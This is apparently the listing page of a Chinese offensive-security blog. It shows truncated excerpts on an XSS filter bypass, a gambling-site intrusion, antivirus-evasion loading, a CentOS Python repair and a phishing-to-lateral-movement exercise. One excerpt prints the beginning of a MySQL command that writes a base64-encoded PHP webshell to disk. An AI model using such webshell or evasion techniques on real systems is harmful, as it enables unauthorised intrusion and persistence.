一处图片引用功能导致的XSS
山重水复疑无路 漏洞点:站点产品评论处 初步测试 一开始尝试XSS,发现程序有过滤,提交均显示Tags are not permitted,最后测出来的是过滤 < ,不过滤 > 因为提示速度比较快,猜测前端有一...
BC实战|从Xss到主机上线
故事的起因 前几天收到一封邮件,内容是这样的: 你说发谁哪里不好,发到我这里来,正好最近辞职了没事干,搞下看看。 加上那个人的好友以后,象征性的聊了几句,大概就是:我说自己因为网赌没...
mysql写冰蝎马
select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
免杀技术 – FilelessPELoader 免杀加载
FilelessPELoader 免杀加载 分享一个好用的 PE 远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载,免杀大部分的杀软 1、首先安装相关 python 库 pip install pycrypt...
CentOS7修复python
一般来说 CentOS 下的 python 和 yum 都卸载不掉的 默认有保护机制 但是总有某些情况下,给删掉,这次就是看到一位老哥把python和yum都给删了。然后想恢复python救急,于是恰好有时间的我就决定...
攻防演练 – 从钓鱼上线到内网漫游
从钓鱼上线到内网漫游 钓鱼 邮箱搜集 在线平台搜集,推荐两个好用的平台 https://app.snov.io/ http://www.skymem.info/ 社工钓鱼 一般钓鱼对象选取安全意识比较薄弱的岗位,如客服、招聘 HR,...
